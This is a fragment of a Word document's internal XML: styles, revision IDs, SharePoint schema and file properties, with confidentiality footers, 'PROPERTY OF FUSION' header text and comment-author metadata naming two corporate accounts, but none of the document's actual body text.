      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="75F8091F" w14:textId="5AF28CC8" w:rsidR="0006413C" w:rsidRDefault="0006413C" w:rsidP="0054676B">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
        </w:pPr>
        <w:r>
          <w:t>CONFIDENTIAL DO NOT REDISTRIBUTE WITHOUT PERMISSION</w:t>
        </w:r>
        <w:r>
          <w:tab/>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D57C" w14:textId="77777777" w:rsidR="0006413C" w:rsidRDefault="0006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46DB" w14:textId="77777777" w:rsidR="0006413C" w:rsidRDefault="0006413C" w:rsidP="0054676B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="582945F5" w14:textId="77777777" w:rsidR="0006413C" w:rsidRDefault="0006413C" w:rsidP="0054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9361" w14:textId="77777777" w:rsidR="0006413C" w:rsidRDefault="0006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B577" w14:textId="24E8FB02" w:rsidR="0006413C" w:rsidRDefault="0006413C">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>PROPERTY OF FUSION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41B4" w14:textId="77777777" w:rsidR="0006413C" w:rsidRDefault="0006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B4089"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD3AC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Bryan J.">
    <w15:presenceInfo w15:providerId="AD" w15:userId="S::bryan.j.alexander@accenture.com::3c4f8613-a97d-4ae5-a8d3-4b2346d26ace"/>
  </w15:person>
  <w15:person w15:author="Iglesias, Gerardo">
    <w15:presenceInfo w15:providerId="AD" w15:userId="S::gerardo.iglesias@accenture.com::948985d1-c11f-421f-be7a-00be9627c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60"/>
    <w:rsid w:val="0000578A"/>
    <w:rsid w:val="00011234"/>
    <w:rsid w:val="00057C09"/>
    <w:rsid w:val="0006413C"/>
    <w:rsid w:val="00067F7F"/>
    <w:rsid w:val="00091BDF"/>
    <w:rsid w:val="000A1A59"/>
    <w:rsid w:val="000C10D8"/>
    <w:rsid w:val="000E73C9"/>
    <w:rsid w:val="000F3DF9"/>
    <w:rsid w:val="00125652"/>
    <w:rsid w:val="0014600F"/>
    <w:rsid w:val="0015597B"/>
    <w:rsid w:val="00163B30"/>
    <w:rsid w:val="00175819"/>
    <w:rsid w:val="001A055C"/>
    <w:rsid w:val="001E48A2"/>
    <w:rsid w:val="001F03B3"/>
    <w:rsid w:val="00231CD9"/>
    <w:rsid w:val="00247DA0"/>
    <w:rsid w:val="00272B68"/>
    <w:rsid w:val="00292EBF"/>
    <w:rsid w:val="002A251E"/>
    <w:rsid w:val="002A5BD7"/>
    <w:rsid w:val="002B26FF"/>
    <w:rsid w:val="002D36C9"/>
    <w:rsid w:val="003530FD"/>
    <w:rsid w:val="00367285"/>
    <w:rsid w:val="003804C5"/>
    <w:rsid w:val="003B408B"/>
    <w:rsid w:val="003D21DD"/>
    <w:rsid w:val="003F3508"/>
    <w:rsid w:val="003F47A8"/>
    <w:rsid w:val="003F7CB3"/>
    <w:rsid w:val="00415140"/>
    <w:rsid w:val="00433FB3"/>
    <w:rsid w:val="004524EC"/>
    <w:rsid w:val="00473BE3"/>
    <w:rsid w:val="00481121"/>
    <w:rsid w:val="00494C37"/>
    <w:rsid w:val="004B1F46"/>
    <w:rsid w:val="004B2DC0"/>
    <w:rsid w:val="004D5D80"/>
    <w:rsid w:val="005007F1"/>
    <w:rsid w:val="00541791"/>
    <w:rsid w:val="0054676B"/>
    <w:rsid w:val="005B45A1"/>
    <w:rsid w:val="005B7151"/>
    <w:rsid w:val="005E043B"/>
    <w:rsid w:val="005F553D"/>
    <w:rsid w:val="00624CC1"/>
    <w:rsid w:val="006420A8"/>
    <w:rsid w:val="00643812"/>
    <w:rsid w:val="00651FD7"/>
    <w:rsid w:val="00690B95"/>
    <w:rsid w:val="006A7FCE"/>
    <w:rsid w:val="006D65FE"/>
    <w:rsid w:val="007270F9"/>
    <w:rsid w:val="00744FDD"/>
    <w:rsid w:val="007576BE"/>
    <w:rsid w:val="007C4C45"/>
    <w:rsid w:val="008007E1"/>
    <w:rsid w:val="00801F5F"/>
    <w:rsid w:val="00831184"/>
    <w:rsid w:val="008779B2"/>
    <w:rsid w:val="00883EE3"/>
    <w:rsid w:val="008A0B31"/>
    <w:rsid w:val="008C3E48"/>
    <w:rsid w:val="008C7D3B"/>
    <w:rsid w:val="008E030B"/>
    <w:rsid w:val="008E2160"/>
    <w:rsid w:val="00936113"/>
    <w:rsid w:val="009509B1"/>
    <w:rsid w:val="00955ABE"/>
    <w:rsid w:val="00960E1E"/>
    <w:rsid w:val="0098583E"/>
    <w:rsid w:val="009A383C"/>
    <w:rsid w:val="009B4314"/>
    <w:rsid w:val="009B4AAE"/>
    <w:rsid w:val="009C6E40"/>
    <w:rsid w:val="009D3139"/>
    <w:rsid w:val="00A03580"/>
    <w:rsid w:val="00A07918"/>
    <w:rsid w:val="00A145D6"/>
    <w:rsid w:val="00A70677"/>
    <w:rsid w:val="00A74312"/>
    <w:rsid w:val="00AA5619"/>
    <w:rsid w:val="00AB1501"/>
    <w:rsid w:val="00B32481"/>
    <w:rsid w:val="00B45C63"/>
    <w:rsid w:val="00B525C0"/>
    <w:rsid w:val="00B53343"/>
    <w:rsid w:val="00B60337"/>
    <w:rsid w:val="00B6483E"/>
    <w:rsid w:val="00BB1762"/>
    <w:rsid w:val="00BE2485"/>
    <w:rsid w:val="00BE4E31"/>
    <w:rsid w:val="00BF1191"/>
    <w:rsid w:val="00C63E27"/>
    <w:rsid w:val="00C6620C"/>
    <w:rsid w:val="00C67499"/>
    <w:rsid w:val="00C679D8"/>
    <w:rsid w:val="00CA4C9A"/>
    <w:rsid w:val="00CC0201"/>
    <w:rsid w:val="00CC7C11"/>
    <w:rsid w:val="00CE2F0D"/>
    <w:rsid w:val="00D021F0"/>
    <w:rsid w:val="00D267B2"/>
    <w:rsid w:val="00D313FE"/>
    <w:rsid w:val="00D35E6F"/>
    <w:rsid w:val="00D501CA"/>
    <w:rsid w:val="00D52039"/>
    <w:rsid w:val="00D57027"/>
    <w:rsid w:val="00D61684"/>
    <w:rsid w:val="00D805D9"/>
    <w:rsid w:val="00D80750"/>
    <w:rsid w:val="00DA43ED"/>
    <w:rsid w:val="00DC7DBE"/>
    <w:rsid w:val="00DD493A"/>
    <w:rsid w:val="00DD74E7"/>
    <w:rsid w:val="00E04FFF"/>
    <w:rsid w:val="00E304A0"/>
    <w:rsid w:val="00E37422"/>
    <w:rsid w:val="00E40222"/>
    <w:rsid w:val="00E433D2"/>
    <w:rsid w:val="00E45682"/>
    <w:rsid w:val="00E530A1"/>
    <w:rsid w:val="00EA2786"/>
    <w:rsid w:val="00F078A0"/>
    <w:rsid w:val="00F3225C"/>
    <w:rsid w:val="00F349E4"/>
    <w:rsid w:val="00F57F57"/>
    <w:rsid w:val="00F64F0F"/>
    <w:rsid w:val="00F82D7F"/>
    <w:rsid w:val="00F87747"/>
    <w:rsid w:val="00F94D6F"/>
    <w:rsid w:val="00FB064C"/>
    <w:rsid w:val="00FB7FA0"/>
    <w:rsid w:val="00FC32CF"/>
    <w:rsid w:val="00FD6175"/>
    <w:rsid w:val="01C67F28"/>
    <w:rsid w:val="04E8518C"/>
    <w:rsid w:val="0CB5C290"/>
    <w:rsid w:val="0D735DE6"/>
    <w:rsid w:val="1578BBF4"/>
    <w:rsid w:val="178AAEAB"/>
    <w:rsid w:val="1878AF27"/>
    <w:rsid w:val="2205248D"/>
    <w:rsid w:val="22429C94"/>
    <w:rsid w:val="22F71E4F"/>
    <w:rsid w:val="2570A17A"/>
    <w:rsid w:val="25866109"/>
    <w:rsid w:val="283C96A6"/>
    <w:rsid w:val="2E5BC97E"/>
    <w:rsid w:val="2FCB0104"/>
    <w:rsid w:val="3324622C"/>
    <w:rsid w:val="344DA1D7"/>
    <w:rsid w:val="37FF472D"/>
    <w:rsid w:val="3CA64B6C"/>
    <w:rsid w:val="4686E1F7"/>
    <w:rsid w:val="488A912E"/>
    <w:rsid w:val="4A961229"/>
    <w:rsid w:val="4C50E030"/>
    <w:rsid w:val="4DA11982"/>
    <w:rsid w:val="4E2F76D4"/>
    <w:rsid w:val="53B0B87D"/>
    <w:rsid w:val="566EB410"/>
    <w:rsid w:val="5B453BBE"/>
    <w:rsid w:val="5EEBB867"/>
    <w:rsid w:val="60E6E315"/>
    <w:rsid w:val="654B54AA"/>
    <w:rsid w:val="6A067A1E"/>
    <w:rsid w:val="6C3B4999"/>
    <w:rsid w:val="6F20C809"/>
    <w:rsid w:val="7012E9D3"/>
    <w:rsid w:val="70756BD4"/>
    <w:rsid w:val="70E1CBA8"/>
    <w:rsid w:val="732A767D"/>
    <w:rsid w:val="77375349"/>
    <w:rsid w:val="790B724E"/>
    <w:rsid w:val="7A48F0C4"/>
    <w:rsid w:val="7B57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44AC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{32D983B3-D62A-4D38-B9CB-C743AF3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6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2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1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BD7"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002A5BD7"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Console">
    <w:name w:val="Console"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="ConsoleChar"/>
    <w:qFormat/>
    <w:rsid w:val="00FB064C"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00A70677"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ConsoleChar">
    <w:name w:val="Console Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Console"/>
    <w:rsid w:val="00FB064C"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00F94D6F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0054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6B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0054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6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7422"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00E37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FBD0FFAC01244B9C685DFC1D58AB6" ma:contentTypeVersion="4" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="832c1e54840ed78db95a0f0c4a9142e4">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="cd887052-f3ea-4a84-a93d-06f8136cea2b" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="b9b301fefd416890f53928a0bc674645" ns2:_="">
    <xsd:import namespace="cd887052-f3ea-4a84-a93d-06f8136ce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052-f3ea-4a84-a93d-06f8136c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B43D3-D468-41E1-B31B-4B4E82511D42}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{AC77ED48-BE2D-44FA-8204-467F26A43FC0}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D65736A0-FFA6-4785-A169-84D6D2616EBF}"/>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{354D0192-E562-45E9-9E88-C6C9BDD37FA8}">
  <ds:schemaRef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d887052-f3ea-4a84-a93d-06f8136cea2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3081</Words>
  <Characters>71949</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>599</Lines>
  <Paragraphs>169</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>8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 Spencer</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Iglesias, Gerardo</cp:lastModifiedBy>
  <cp:revision>81</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-14T19:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-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FBD0FFAC01244B9C685DFC1D58AB6</vt:lpwstr>
  </property>
</Properties>
</file>